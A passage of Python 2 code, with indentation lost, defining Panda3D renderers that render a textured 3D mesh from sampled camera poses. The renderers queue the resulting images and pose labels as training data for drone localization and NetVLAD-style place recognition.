#imX = im.astype('float32')/255. - .5 # TODO: have a mean image
#imX = (im.astype('float32') - 128.0) /128.
imX = im.astype('float32') #- self.meanImage
## Put imX into the queue
# do not queue up if queue size begin to exceed 150
self.q_imStack.put( imX )
self.q_labelStack.put( texPoses[c,:] )
# fname = '__'+str(poses[c,0]) + '_' + str(poses[c,1]) + '_' + str(poses[c,2]) + '_' + str(poses[c,3]) + '_'
# cv2.imwrite( str(TrainRenderer.renderIndx)+'__'+str(i)+str(j)+fname+'.png', imX.astype('uint8') )
c = c + 1
else:
if self.queue_warning:
print 'q_imStack.qsize() > 150. Queue is filled, not retriving the rendered data'
#
# Call caffe iteration (reads from q_imStack and q_labelStack)
# Possibly upgrade to TensorFlow
# self.learning_iteration()
# if( TrainRenderer.renderIndx > 50 ):
# return None
#
# Prep for Next Iteration
TrainRenderer.renderIndx = TrainRenderer.renderIndx + 1
self.prevPoses = poses
return task.cont
## Execute 1-step.
##
## This function is to be called from outside to render once. This is a wrapper for app.taskMgr.step()
def step(self, batchsize):
""" One rendering.
This function needs to be called from outside in a loop for continous rendering
Returns 2 variables. One im_batch and another label
"""
# ltimes = int( batchsize/16 ) + 1
# print 'Render ', ltimes, 'times'
# for x in range(ltimes):
# Note: 2 renders sometime fails. Donno exactly what happens :'(
# Instead I do app.taskMgr.step() in the main() instead, once and 1 time here. This seem to work OK
# self.taskMgr.step()
# Thread.sleep(0.1)
if self.q_imStack.qsize() < 16*5:
self.taskMgr.step()
# print 'Queues Status (imStack=%d,labelStack=%d)' %(self.q_imStack.qsize(), self.q_labelStack.qsize())
# TODO: Check validity of batchsize. Also avoid hard coding the thresh for not retriving from queue.
im_batch = np.zeros((batchsize,240,320,3))
label_batch = np.zeros((batchsize,4))
# assert self.q_imStack.qsize() > 16*5
if self.q_imStack.qsize() >= 16*5:
# get a batch out
for i in range(batchsize):
im = self.q_imStack.get() #240x320x3 RGB
y = self.q_labelStack.get()
# print 'retrive', i
#remember to z-normalize
im_batch[i,:,:,0] = copy.deepcopy(im[:,:,0])#self.zNormalized( copy.deepcopy(im[:,:,0]) )
im_batch[i,:,:,1] = copy.deepcopy(im[:,:,1])#self.zNormalized( copy.deepcopy(im[:,:,1]) )
im_batch[i,:,:,2] = copy.deepcopy(im[:,:,2])#self.zNormalized( copy.deepcopy(im[:,:,2]) )
label_batch[i,0] = copy.deepcopy( y[0] )
label_batch[i,1] = copy.deepcopy( y[1] )
label_batch[i,2] = copy.deepcopy( y[2] )
label_batch[i,3] = copy.deepcopy( y[3] )
else:
return None, None
f_im = 'im_batch.pickle'
f_lab = 'label_batch.pickle'
print 'Loading : ', f_im, f_lab
with open( f_im, 'rb' ) as handle:
im_batch = pickle.load(handle )
with open( f_lab, 'rb' ) as handle:
label_batch = pickle.load(handle )
print 'Done.@!'
# im_batch = copy.deepcopy( self.X_im_batch )
# # label_batch = copy.deepcopy( self.X_label_batch )
#
r0 = np.random.randint( 0, im_batch.shape[0], batchsize )
# r1 = np.random.randint( 0, im_batch.shape[0], batchsize )
im_batch = im_batch[r0]
label_batch = label_batch[r0]
# Note:
# What is being done here is a bit of a hack. The thing is
# in the mainloop() ie. in train_tf_decop.py doesn't allow any
# if statements. So, I have instead saved a few example-renders on a
# pickle-file. If the queue is not sufficiently filled i just return
# from the saved file.
return im_batch, label_batch
def __init__(self, queue_warning=True):
ShowBase.__init__(self)
self.taskMgr.add( self.renderNlearnTask, "renderNlearnTask" ) #changing camera poses
self.taskMgr.add( self.putAxesTask, "putAxesTask" ) #draw co-ordinate axis
self.taskMgr.add( self.putTrainingBox, "putTrainingBox" )
self.queue_warning = queue_warning #suppress the warning of queue full if this var is True
# Set up training area. This is used in monte_carlo_sample() and putTrainingBox()
self.mc_X_max = 300
self.mc_X_min = -300
self.mc_Y_max = 360
self.mc_Y_min = -360
self.mc_Z_max = 120
self.mc_Z_min = 45
self.mc_yaw_max = 60
self.mc_yaw_min = -60
self.mc_roll_max = 5
self.mc_roll_min = -5
self.mc_pitch_max = 5
self.mc_pitch_min = -5
# # Note params
# self.PARAM_TENSORBOARD_PREFIX = TENSORBOARD_PREFIX
# self.PARAM_MODEL_SAVE_PREFIX = MODEL_SAVE_PREFIX
# self.PARAM_MODEL_RESTORE = MODEL_RESTORE
#
# self.PARAM_WRITE_SUMMARY_EVERY = WRITE_SUMMARY_EVERY
# self.PARAM_WRITE_TF_MODEL_EVERY = WRITE_TF_MODEL_EVERY
# Misc Setup
self.render.setAntialias(AntialiasAttrib.MAuto)
self.setFrameRateMeter(True)
self.tcolor = TerminalColors.bcolors()
#
# Set up Mesh (including load, position, orient, scale)
self.setupMesh()
self.positionMesh()
# Custom Render
# Important Note: self.render displays the low_res and self.scene0 is the images to retrive
self.scene0 = NodePath("scene0")
# cytX = copy.deepcopy( cyt )
self.low_res.reparentTo(self.render)
self.cyt.reparentTo(self.scene0)
self.cyt2.reparentTo(self.scene0)
#
# Make Buffering Window
bufferProp = FrameBufferProperties().getDefault()
props = WindowProperties()
props.setSize(1280, 960)
win2 = self.graphicsEngine.makeOutput( pipe=self.pipe, name='wine1',
sort=-1, fb_prop=bufferProp , win_prop=props,
flags=GraphicsPipe.BFRequireWindow)
#flags=GraphicsPipe.BFRefuseWindow)
# self.window = win2#self.win #dr.getWindow()
self.win2 = win2
# self.win2.setupCopyTexture()
# Adopted from : https://www.panda3d.org/forums/viewtopic.php?t=3880
#
# Set Multiple Cameras
self.cameraList = []
for i in range(4*4):
print 'Create camera#', i
self.cameraList.append( self.customCamera( str(i) ) )
# Disable default camera
# dr = self.camNode.getDisplayRegion(0)
# dr.setActive(0)
#
# Set Display Regions (4x4)
dr_list = self.customDisplayRegion(4,4)
#
# Setup each camera
for i in range(len(dr_list)):
dr_list[i].setCamera( self.cameraList[i] )
#
# Set buffered Queues (to hold rendered images and their positions)
# each queue element will be an RGB image of size 240x320x3
self.q_imStack = Queue.Queue()
self.q_labelStack = Queue.Queue()
print self.tcolor.OKGREEN, '\n##########\n'+'Panda3d Renderer Initialization Complete'+'\n##########\n', self.tcolor.ENDC
class TestRenderer(ShowBase):
renderIndx=0
## Basic Mesh & Camera Setup
def loadAllTextures(self, mesh, basePath, silent=True):
""" Loads texture files for a mesh """
c = 0
for child in mesh.getChildren():
submesh_name = child.get_name()
submesh_texture = basePath + submesh_name[:-5] + 'tex0.jpg'
child.setTexture( self.loader.loadTexture(submesh_texture) )
if silent == False:
print 'Loading texture file : ', submesh_texture
c = c + 1
print self.tcolor.OKGREEN, "Loaded ", c, "textures", self.tcolor.ENDC
def setupMesh(self):
""" Loads the .obj files. Will load mesh sub-divisions separately """
print 'Attempt Loading Mesh VErtices, FAces'
self.cyt = self.loader.loadModel( 'model_l/l6/level_6_0_0.obj' )
self.cyt2 = self.loader.loadModel( 'model_l/l6/level_6_128_0.obj' )
self.low_res = self.loader.loadModel( 'model_l/l0/level_0_0_0.obj' )
print self.tcolor.OKGREEN, 'Done Loading Vertices', self.tcolor.ENDC
print 'Attempt Loading Textures'
self.loadAllTextures( self.cyt, 'model_l/l6/')
self.loadAllTextures( self.cyt2, 'model_l/l6/')
self.loadAllTextures( self.low_res, 'model_l/l0/')
print self.tcolor.OKGREEN, 'Done Loading Textures', self.tcolor.ENDC
def positionMesh(self):
""" WIll have to manually adjust this for ur mesh. I position the
center where I fly my drone and oriented in ENU (East-north-up)
cords for easy alignment of GPS and my cordinates. If your model
is not metric scale will have to adjust for that too"""
self.cyt.setPos( 140,-450, 150 )
self.cyt2.setPos( 140,-450, 150 )
self.low_res.setPos( 140,-450, 150 )
self.cyt.setHpr( 198, -90, 0 )
self.cyt2.setHpr( 198, -90, 0 )
self.low_res.setHpr( 198, -90, 0 )
self.cyt.setScale(172)
self.cyt2.setScale(172)
self.low_res.setScale(172)
def customCamera(self, nameIndx):
lens = self.camLens
lens.setFov(83)
print 'self.customCamera : Set FOV at 83'
my_cam = Camera("cam"+nameIndx, lens)
my_camera = self.scene0.attachNewNode(my_cam)
# my_camera = self.render.attachNewNode(my_cam)
my_camera.setName("camera"+nameIndx)
return my_camera
def customDisplayRegion(self, rows, cols):
rSize = 1.0 / rows
cSize = 1.0 / cols
dr_list = []
for i in range(0,rows):
for j in range(0,cols):
# print i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize
dr_i = self.win2.makeDisplayRegion(i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize)
dr_i.setSort(-5)
dr_list.append( dr_i )
return dr_list
def monte_carlo_sample(self):
""" Gives a random 6-dof pose. Need to set params manually here.
X,Y,Z, Yaw(abt Z-axis), Pitch(abt X-axis), Roll(abt Y-axis) """
X = np.random.uniform(-50,50)
Y = np.random.uniform(-100,100)
Z = np.random.uniform(50,100)
yaw = np.random.uniform(-60,60)
roll = np.random.uniform(-5,5)
pitch = np.random.uniform(-5,5)
return X,Y,Z, yaw,roll,pitch
## Annotation-helpers for self.render
def putBoxes(self,X,Y,Z,r=1.,g=0.,b=0., scale=1.0):
cube_x = CubeMaker.CubeMaker().generate()
cube_x.setColor(r,g,b)
cube_x.setScale(scale)
cube_x.reparentTo(self.render)
cube_x.setPos(X,Y,Z)
def putAxesTask(self,task):
cube_x = CubeMaker.CubeMaker().generate()
cube_x.setColor(1.0,0.0,0.0)
cube_x.setScale(1)
cube_x.reparentTo(self.render)
cube_x.setPos(task.frame,0,0)
cube_y = CubeMaker.CubeMaker().generate()
cube_y.setColor(0.0,1.0,0.0)
cube_y.setScale(1)
cube_y.reparentTo(self.render)
cube_y.setPos(0,task.frame,0)
cube_z = CubeMaker.CubeMaker().generate()
cube_z.setColor(0.0,0.0,1.0)
cube_z.setScale(1)
cube_z.reparentTo(self.render)
cube_z.setPos(0,0,task.frame)
if task.time > 25:
return None
return task.cont
## Render-n-Learn task.
## Sets the camera position (1-cam only) with spline or your choice (see init).
### Renders the image at that point and queue the image and its position (pose)
def renderNtestTask(self, task):
if task.frame < 50: #do not do anything for 50 ticks, as spline's 1st node is at t=50
return task.cont
# print randX, randY, randZ
t = task.frame
if t > self.spl_u.max():
print 'End of Spline, End task'
# fName = 'trace__' + self.pathGen.__name__ + '.npz'
# np.savez( fName, loss=self.loss_ary, gt=self.gt_ary, pred=self.pred_ary )
# print 'PathData File Written : ', fName
# print 'Visualize result : `python tools/analyse_path_trace_subplot.py', fName, '`'
return None
#
# set pose in each camera
# Note: The texture is grided images in a col-major format
# TODO : since it is going to be only 1 camera eliminate this loop to simply code
poses = np.zeros( (len(self.cameraList), 4), dtype='float32' )
for i in range(len(self.cameraList)): #here usually # of cams will be 1 (for TestRenderer)
indx = TestRenderer.renderIndx
pt = interpolate.splev( t, self.spl_tck)
#randX,randY, randZ, randYaw, randPitch, randRoll = self.monte_carlo_sample()
randX = pt[0]
randY = pt[1]
randZ = pt[2]
randYaw = pt[3]
randPitch = 0
randRoll = 0
self.cameraList[i].setPos(randX,randY,randZ)
self.cameraList[i].setHpr(randYaw,-90+randPitch,0+randRoll)
poses[i,0] = randX
poses[i,1] = randY
poses[i,2] = randZ
poses[i,3] = randYaw
# make note of the poses just set as this will take effect next
if TestRenderer.renderIndx == 0:
TestRenderer.renderIndx = TestRenderer.renderIndx + 1
# self.putBoxes(0,0,0, scale=100)
self.prevPoses = poses
return task.cont
#
# Retrive Rendered Data
tex = self.win2.getScreenshot()
# A = np.array(tex.getRamImageAs("RGB")).reshape(960,1280,3) #@#
A = np.array(tex.getRamImageAs("RGB")).reshape(240,320,3)
# A = np.zeros((960,1280,3))
# A_bgr = cv2.cvtColor(A.astype('uint8'),cv2.COLOR_RGB2BGR)
# cv2.imwrite( str(TestRenderer.renderIndx)+'.png', A_bgr.astype('uint8') )
# myTexture = self.win2.getTexture()
# print myTexture
# retrive poses from prev render
texPoses = self.prevPoses
#
# Cut rendered data into individual image. Note rendered data will be 4X4 grid of images
#960 rows and 1280 cols (4x4 image-grid)
nRows = 240
nCols = 320
# Iterate over the rendered texture in a col-major format
c=0
# TODO : Eliminate this 2-loop as we know there is only 1 display region
#if self.q_imStack.qsize() < 150: #no limit on queue size
# for j in range(1): #j is for cols-indx
# for i in range(1): #i is for rows-indx
i=0
j=0
#print i*nRows, j*nCols, (i+1)*nRows, (j+1)*nCols
im = A[i*nRows:(i+1)*nRows,j*nCols:(j+1)*nCols,:]
#imX = im.astype('float32')/255. - .5 # TODO: have a mean image
#imX = (im.astype('float32') - 128.0) /128.
imX = im.astype('float32') #- self.meanImage
# Put imX into the queue
# do not queue up if queue size begin to exceed 150
self.q_imStack.put( imX )
self.q_labelStack.put( texPoses[c,:] )
self.putBoxes( texPoses[c,0], texPoses[c,1], texPoses[c,2] )
# print 'putBoxes', texPoses[c,0], texPoses[c,1], texPoses[c,2]
# fname = '__'+str(poses[c,0]) + '_' + str(poses[c,1]) + '_' + str(poses[c,2]) + '_' + str(poses[c,3]) + '_'
# cv2.imwrite( str(TestRenderer.renderIndx)+'__'+str(i)+str(j)+fname+'.png', imX.astype('uint8') )
c = c + 1
#
# Prep for Next Iteration
TestRenderer.renderIndx = TestRenderer.renderIndx + 1
self.prevPoses = poses
# if( TestRenderer.renderIndx > 5 ):
# return None
return task.cont
def step(self):
self.taskMgr.step()
# print 'Queues Status (imStack=%d,labelStack=%d)' %(self.q_imStack.qsize(), self.q_labelStack.qsize())
# Dequeue 1 elements
if self.q_imStack.qsize() > 2: # Do not dequeue if the queue size is less than 2
im = copy.deepcopy( self.q_imStack.get() ) #240x320x3 RGB
y = copy.deepcopy( self.q_labelStack.get() )
return im, y
else:
return None, None
def __init__(self, pathGen=None ):
ShowBase.__init__(self)
self.taskMgr.add( self.renderNtestTask, "renderNtestTask" ) #changing camera poses
self.taskMgr.add( self.putAxesTask, "putAxesTask" ) #draw co-ordinate axis
# Misc Setup
self.render.setAntialias(AntialiasAttrib.MAuto)
self.setFrameRateMeter(True)
self.tcolor = TerminalColors.bcolors()
#
# Set up Mesh (including load, position, orient, scale)
self.setupMesh()
self.positionMesh()
# Custom Render
# Important Note: self.render displays the low_res and self.scene0 is the images to retrive
self.scene0 = NodePath("scene0")
# cytX = copy.deepcopy( cyt )
self.low_res.reparentTo(self.render)
self.cyt.reparentTo(self.scene0)
self.cyt2.reparentTo(self.scene0)
#
# Make Buffering Window
bufferProp = FrameBufferProperties().getDefault()
props = WindowProperties()
# props.setSize(1280, 960)
props.setSize(320, 240) #@#
win2 = self.graphicsEngine.makeOutput( pipe=self.pipe, name='wine1',
sort=-1, fb_prop=bufferProp , win_prop=props,
flags=GraphicsPipe.BFRequireWindow)
#flags=GraphicsPipe.BFRefuseWindow)
# self.window = win2#self.win #dr.getWindow()
self.win2 = win2
# self.win2.setupCopyTexture()
# Adopted from : https://www.panda3d.org/forums/viewtopic.php?t=3880
#
# Set Multiple Cameras
self.cameraList = []
# for i in range(4*4):
for i in range(1*1): #@#
print 'Create camera#', i
self.cameraList.append( self.customCamera( str(i) ) )
# Disable default camera
# dr = self.camNode.getDisplayRegion(0)
# dr.setActive(0)
#
# Set Display Regions (4x4)
dr_list = self.customDisplayRegion(1,1)
#
# Setup each camera
for i in range(len(dr_list)):
dr_list[i].setCamera( self.cameraList[i] )
#
# Set buffered Queues (to hold rendered images and their positions)
# each queue element will be an RGB image of size 240x320x3
self.q_imStack = Queue.Queue()
self.q_labelStack = Queue.Queue()
#
# Setting up Splines
# Note: Start interpolation at 50,
if pathGen is None:
# self.pathGen = PathMaker.PathMaker().path_flat_h
# self.pathGen = PathMaker.PathMaker().path_smallM
# self.pathGen = PathMaker.PathMaker().path_yaw_only
# self.pathGen = PathMaker.PathMaker().path_bigM
# self.pathGen = PathMaker.PathMaker().path_flat_spiral
# self.pathGen = PathMaker.PathMaker().path_helix
# self.pathGen = PathMaker.PathMaker().path_like_real
# self.pathGen = PathMaker.PathMaker().path_like_real2
self.pathGen = PathMaker.PathMaker().path_large_loop
else:
self.pathGen = pathGen
t,X = self.pathGen()
self.spl_tck, self.spl_u = interpolate.splprep(X.T, u=t.T, s=0.0, per=1)
print 'Test Renderer Init Done'
print self.tcolor.OKGREEN, 'Test Renderer Init Done', self.tcolor.ENDC
# Setup NetVLAD Renderer - This renderer is custom made for NetVLAD training
# It renders 16 images at a time. (q, (P1,P2,..P5), (N1,N2,...,N10)).
# ie. 1st image is im, next 5 are near this im (potential positives).
# Last 10 are far from im (definite negatives)
class NetVLADRenderer(ShowBase):
renderIndx=0
# Basic Mesh & Camera Setup
def loadAllTextures(self, mesh, basePath, silent=True):
""" Loads texture files for a mesh """
c = 0
for child in mesh.getChildren():
submesh_name = child.get_name()
submesh_texture = basePath + submesh_name[:-5] + 'tex0.jpg'
child.setTexture( self.loader.loadTexture(submesh_texture) )
if silent == False:
print 'Loading texture file : ', submesh_texture
c = c + 1
print self.tcolor.OKGREEN, "Loaded ", c, "textures", self.tcolor.ENDC
def setupMesh(self):
""" Loads the .obj files. Will load mesh sub-divisions separately """
print 'Attempt Loading Mesh VErtices, FAces'
self.cyt = self.loader.loadModel( 'model_l/l6/level_6_0_0.obj' )
self.cyt2 = self.loader.loadModel( 'model_l/l6/level_6_128_0.obj' )
self.low_res = self.loader.loadModel( 'model_l/l3/level_3_0_0.obj' )
print self.tcolor.OKGREEN, 'Done Loading Vertices', self.tcolor.ENDC
print 'Attempt Loading Textures'
self.loadAllTextures( self.cyt, 'model_l/l6/')
self.loadAllTextures( self.cyt2, 'model_l/l6/')
self.loadAllTextures( self.low_res, 'model_l/l3/')
print self.tcolor.OKGREEN, 'Done Loading Textures', self.tcolor.ENDC
def positionMesh(self):
""" WIll have to manually adjust this for ur mesh. I position the
center where I fly my drone and oriented in ENU (East-north-up)
cords for easy alignment of GPS and my cordinates. If your model
is not metric scale will have to adjust for that too"""
self.cyt.setPos( 140,-450, 150 )
self.cyt2.setPos( 140,-450, 150 )
self.low_res.setPos( 140,-450, 150 )
self.cyt.setHpr( 198, -90, 0 )
self.cyt2.setHpr( 198, -90, 0 )
self.low_res.setHpr( 198, -90, 0 )
self.cyt.setScale(172)
self.cyt2.setScale(172)
self.low_res.setScale(172)
def customCamera(self, nameIndx):
lens = self.camLens
lens.setFov(83)
print 'self.customCamera : Set FOV at 83'
my_cam = Camera("cam"+nameIndx, lens)
my_camera = self.scene0.attachNewNode(my_cam)
# my_camera = self.render.attachNewNode(my_cam)
my_camera.setName("camera"+nameIndx)
return my_camera
def customDisplayRegion(self, rows, cols):
rSize = 1.0 / rows
cSize = 1.0 / cols
dr_list = []
for i in range(0,rows):
for j in range(0,cols):
# print i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize
dr_i = self.win2.makeDisplayRegion(i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize)
dr_i.setSort(-5)
dr_list.append( dr_i )
return dr_list
def mc_default( self, cam0X, cam0Y, cam0Z ):
return 0,0,80,0,0,0
def mc_far( self, cam0X, cam0Y, cam0Z ):
rf = np.random.uniform
nZ = rf(self.mc_Z_min,self.mc_Z_max)
fov = 1.3962 #80 degrees
sigma = cam0Z * np.tan(fov/2.)/3
nX = rf(self.mc_X_min, cam0X - 2*sigma) if rf(-1,1) > 0 else rf(cam0X + 2*sigma, self.mc_X_max )
nY = rf(self.mc_Y_min, cam0Y - 2*sigma) if rf(-1,1) > 0 else rf(cam0Y + 2*sigma, self.mc_Y_max )
yaw = rf(self.mc_yaw_min, self.mc_yaw_max)
return nX, nY, nZ, yaw, 0 , 0
# Return a random sample near (cam0X,cam0Y,cam0Z)
def mc_near( self, cam0X, cam0Y, cam0Z ):
rf = np.random.uniform
nZ = rf(self.mc_Z_min,self.mc_Z_max)
fov = 1.3962 #80 degrees
sigma = cam0Z * np.tan(fov/2.)/3
yaw = rf(self.mc_yaw_min, self.mc_yaw_max)
return rf(cam0X-sigma,cam0X+sigma), rf(cam0Y-sigma,cam0Y+sigma),nZ,yaw,0.,0.
## Gives a random 6-dof pose. Need to set params manually here.
## X,Y,Z, Yaw(abt Z-axis), Pitch(abt X-axis), Roll(abt Y-axis)
## @param No
def monte_carlo_sample(self):
# mc_X_min etc are set in constructor
X = np.random.uniform(self.mc_X_min,self.mc_X_max)
Y = np.random.uniform(self.mc_Y_min,self.mc_Y_max)
Z = np.random.uniform(self.mc_Z_min,self.mc_Z_max)
yaw = np.random.uniform( self.mc_yaw_min, self.mc_yaw_max)
roll = 0#np.random.uniform( self.mc_roll_min, self.mc_roll_max)
pitch = 0#np.random.uniform( self.mc_pitch_min, self.mc_pitch_max)
return X,Y,Z, yaw,roll,pitch
## Annotation-helpers for self.render
def putBoxes(self,X,Y,Z,r=1.,g=0.,b=0., scale=1.0):
cube_x = CubeMaker.CubeMaker().generate()
cube_x.setColor(r,g,b)
cube_x.setScale(scale)
cube_x.reparentTo(self.render)
cube_x.setPos(X,Y,Z)
## Set a cube in 3d env
def putTrainingBox(self,task):
cube = CubeMaker.CubeMaker().generate()
cube.setTransparency(TransparencyAttrib.MAlpha)
cube.setAlphaScale(0.5)
# cube.setScale(10)
# mc_X_min etc are set in constructor
sx = 0.5 * (self.mc_X_max - self.mc_X_min)
sy = 0.5 * (self.mc_Y_max - self.mc_Y_min)
sz = 0.5 * (self.mc_Z_max - self.mc_Z_min)
ax = 0.5 * (self.mc_X_max + self.mc_X_min)
ay = 0.5 * (self.mc_Y_max + self.mc_Y_min)
az = 0.5 * (self.mc_Z_max + self.mc_Z_min)
cube.setSx(sx)
cube.setSy(sy)
cube.setSz(sz)
cube.reparentTo(self.render)
cube.setPos(ax,ay,az)
## Task. This task draw the XYZ axis
def putAxesTask(self,task):
if (task.frame / 10) % 2 == 0:
cube_x = CubeMaker.CubeMaker().generate()
cube_x.setColor(1.0,0.0,0.0)
cube_x.setScale(1)
cube_x.reparentTo(self.render)
cube_x.setPos(task.frame,0,0)
cube_y = CubeMaker.CubeMaker().generate()
cube_y.setColor(0.0,1.0,0.0)
cube_y.setScale(1)
cube_y.reparentTo(self.render)
cube_y.setPos(0,task.frame,0)
cube_z = CubeMaker.CubeMaker().generate()
cube_z.setColor(0.0,0.0,1.0)
cube_z.setScale(1)
cube_z.reparentTo(self.render)
cube_z.setPos(0,0,task.frame)
if task.time > 25:
return None
return task.cont
## Render-n-Learn task
##
## set pose in each camera <br/>
## make note of the poses just set as this will take effect next <br/>
## Retrive Rendered Data <br/>
## Cut rendered data into individual image. Note rendered data will be 4X4 grid of images <br/>
## Put imX into the queue <br/>
def renderNlearnTask(self, task):
if task.time < 2: #do not do anything for 1st 2 sec
return task.cont
# print randX, randY, randZ
#
## set pose in each camera
# Note: The texture is grided images in a col-major format
poses = np.zeros( (len(self.cameraList), 4), dtype='float32' )
_randX= _randY= _randZ= _randYaw= _randPitch= _randRoll = 0
for i in range(len(self.cameraList)):
if i==0:
_randX,_randY, _randZ, _randYaw, _randPitch, _randRoll = self.monte_carlo_sample()
(randX,randY, randZ, randYaw, randPitch, randRoll) = _randX, _randY, _randZ, _randYaw, _randPitch, _randRoll
elif i>=1 and i<6:
randX,randY, randZ, randYaw, randPitch, randRoll = self.mc_near(_randX, _randY, _randZ )
else:
randX,randY, randZ, randYaw, randPitch, randRoll = self.mc_far(_randX, _randY, _randZ)
self.cameraList[i].setPos(randX,randY,randZ)
self.cameraList[i].setHpr(randYaw,-90+randPitch,0+randRoll)
poses[i,0] = randX
poses[i,1] = randY
poses[i,2] = randZ
poses[i,3] = randYaw
# self.putBoxes(randX,randY,randZ, scale=0.3)
#
# if task.frame < 100:
# return task.cont
# else:
# return None
## make note of the poses just set as this will take effect next
if NetVLADRenderer.renderIndx == 0:
NetVLADRenderer.renderIndx = NetVLADRenderer.renderIndx + 1
self.prevPoses = poses
return task.cont
#
## Retrive Rendered Data
tex = self.win2.getScreenshot()
A = np.array(tex.getRamImageAs("RGB")).reshape(960,1280,3)
# A = np.zeros((960,1280,3))
# A_bgr = cv2.cvtColor(A.astype('uint8'),cv2.COLOR_RGB2BGR)
# cv2.imwrite( str(TrainRenderer.renderIndx)+'.png', A_bgr.astype('uint8') )
# myTexture = self.win2.getTexture()
# print myTexture
# retrive poses from prev render
texPoses = self.prevPoses
#
## Cut rendered data into individual image. Note rendered data will be 4X4 grid of images
#960 rows and 1280 cols (4x4 image-grid)
nRows = 240
nCols = 320
# Iterate over the rendered texture in a col-major format
c=0
if self.q_imStack.qsize() < 150:
for j in range(4): #j is for cols-indx
for i in range(4): #i is for rows-indx
#print i*nRows, j*nCols, (i+1)*nRows, (j+1)*nCols
im = A[i*nRows:(i+1)*nRows,j*nCols:(j+1)*nCols,:]
#imX = im.astype('float32')/255. - .5 # TODO: have a mean image
#imX = (im.astype('float32') - 128.0) /128.
imX = im.astype('float32') #- self.meanImage
# print 'Noise Added to renderedIm'
# imX = imX + 10.*np.random.randn( imX.shape[0], imX.shape[1], imX.shape[2] )
## Put imX into the queue
# do not queue up if queue size begin to exceed 150
self.q_imStack.put( imX )
self.q_labelStack.put( texPoses[c,:] )
# fname = '__'+str(poses[c,0]) + '_' + str(poses[c,1]) + '_' + str(poses[c,2]) + '_' + str(poses[c,3]) + '_'
# cv2.imwrite( str(TrainRenderer.renderIndx)+'__'+str(i)+str(j)+fname+'.png', imX.astype('uint8') )
c = c + 1
else:
print 'q_imStack.qsize() > 150. Queue is filled, not retriving the rendered data'
#
# Call caffe iteration (reads from q_imStack and q_labelStack)
# Possibly upgrade to TensorFlow
# self.learning_iteration()
# if( TrainRenderer.renderIndx > 50 ):
# return None
#
# Prep for Next Iteration
NetVLADRenderer.renderIndx = NetVLADRenderer.renderIndx + 1
self.prevPoses = poses
return task.cont
## Execute 1-step.
##
## This function is to be called from outside to render once. This is a wrapper for app.taskMgr.step()
def step(self, batchsize):
""" One rendering.
This function needs to be called from outside in a loop for continous rendering
Returns 2 variables. One im_batch and another label
"""
# ltimes = int( batchsize/16 ) + 1
# print 'Render ', ltimes, 'times'
# for x in range(ltimes):
# Note: 2 renders sometime fails. Donno exactly what happens :'(
# Instead I do app.taskMgr.step() in the main() instead, once and 1 time here. This seem to work OK
# self.taskMgr.step()
# Thread.sleep(0.1)
self.taskMgr.step()
# print 'Queues Status (imStack=%d,labelStack=%d)' %(self.q_imStack.qsize(), self.q_labelStack.qsize())
# TODO: Check validity of batchsize. Also avoid hard coding the thresh for not retriving from queue.
im_batch = np.zeros((batchsize,240,320,3))
label_batch = np.zeros((batchsize,4))
# assert self.q_imStack.qsize() > 16*5
if self.q_imStack.qsize() >= 16*5:
# get a batch out
for i in range(batchsize):
im = self.q_imStack.get() #240x320x3 RGB
y = self.q_labelStack.get()
# print 'retrive', i
#remember to z-normalize
im_batch[i,:,:,0] = copy.deepcopy(im[:,:,0])#self.zNormalized( copy.deepcopy(im[:,:,0]) )
im_batch[i,:,:,1] = copy.deepcopy(im[:,:,1])#self.zNormalized( copy.deepcopy(im[:,:,1]) )
im_batch[i,:,:,2] = copy.deepcopy(im[:,:,2])#self.zNormalized( copy.deepcopy(im[:,:,2]) )
label_batch[i,0] = copy.deepcopy( y[0] )
label_batch[i,1] = copy.deepcopy( y[1] )
label_batch[i,2] = copy.deepcopy( y[2] )
label_batch[i,3] = copy.deepcopy( y[3] )
else:
return None, None
f_im = 'im_batch.pickle'
f_lab = 'label_batch.pickle'
print 'Loading : ', f_im, f_lab
with open( f_im, 'rb' ) as handle:
im_batch = pickle.load(handle )
with open( f_lab, 'rb' ) as handle:
label_batch = pickle.load(handle )
print 'Done.@!'
# im_batch = copy.deepcopy( self.X_im_batch )
# # label_batch = copy.deepcopy( self.X_label_batch )
#
r0 = np.random.randint( 0, im_batch.shape[0], batchsize )
# r1 = np.random.randint( 0, im_batch.shape[0], batchsize )
im_batch = im_batch[r0]
label_batch = label_batch[r0]
# Note:
# What is being done here is a bit of a hack. The thing is
# in the mainloop() ie. in train_tf_decop.py doesn't allow any
# if statements. So, I have instead saved a few example-renders on a
# pickle-file. If the queue is not sufficiently filled i just return
# from the saved file.
return im_batch, label_batch
def __init__(self):
ShowBase.__init__(self)
self.taskMgr.add( self.renderNlearnTask, "renderNlearnTask" ) #changing camera poses
self.taskMgr.add( self.putAxesTask, "putAxesTask" ) #draw co-ordinate axis
self.taskMgr.add( self.putTrainingBox, "putTrainingBox" )
# Set up training area. This is used in monte_carlo_sample() and putTrainingBox()
self.mc_X_max = 300
self.mc_X_min = -300
self.mc_Y_max = 360
self.mc_Y_min = -360
self.mc_Z_max = 120
self.mc_Z_min = 45
self.mc_yaw_max = 85
self.mc_yaw_min = -85
self.mc_roll_max = 5
self.mc_roll_min = -5
self.mc_pitch_max = 5
self.mc_pitch_min = -5
# # Note params
# self.PARAM_TENSORBOARD_PREFIX = TENSORBOARD_PREFIX
# self.PARAM_MODEL_SAVE_PREFIX = MODEL_SAVE_PREFIX
# self.PARAM_MODEL_RESTORE = MODEL_RESTORE
#
# self.PARAM_WRITE_SUMMARY_EVERY = WRITE_SUMMARY_EVERY
# self.PARAM_WRITE_TF_MODEL_EVERY = WRITE_TF_MODEL_EVERY
# Misc Setup
self.render.setAntialias(AntialiasAttrib.MAuto)
self.setFrameRateMeter(True)
self.tcolor = TerminalColors.bcolors()
#
# Set up Mesh (including load, position, orient, scale)
self.setupMesh()
self.positionMesh()
# Custom Render
# Important Note: self.render displays the low_res and self.scene0 is the images to retrive
self.scene0 = NodePath("scene0")
# cytX = copy.deepcopy( cyt )
self.low_res.reparentTo(self.render)
self.cyt.reparentTo(self.scene0)
self.cyt2.reparentTo(self.scene0)
#
# Make Buffering Window
bufferProp = FrameBufferProperties().getDefault()
props = WindowProperties()
props.setSize(1280, 960)
win2 = self.graphicsEngine.makeOutput( pipe=self.pipe, name='wine1',
sort=-1, fb_prop=bufferProp , win_prop=props,
flags=GraphicsPipe.BFRequireWindow)
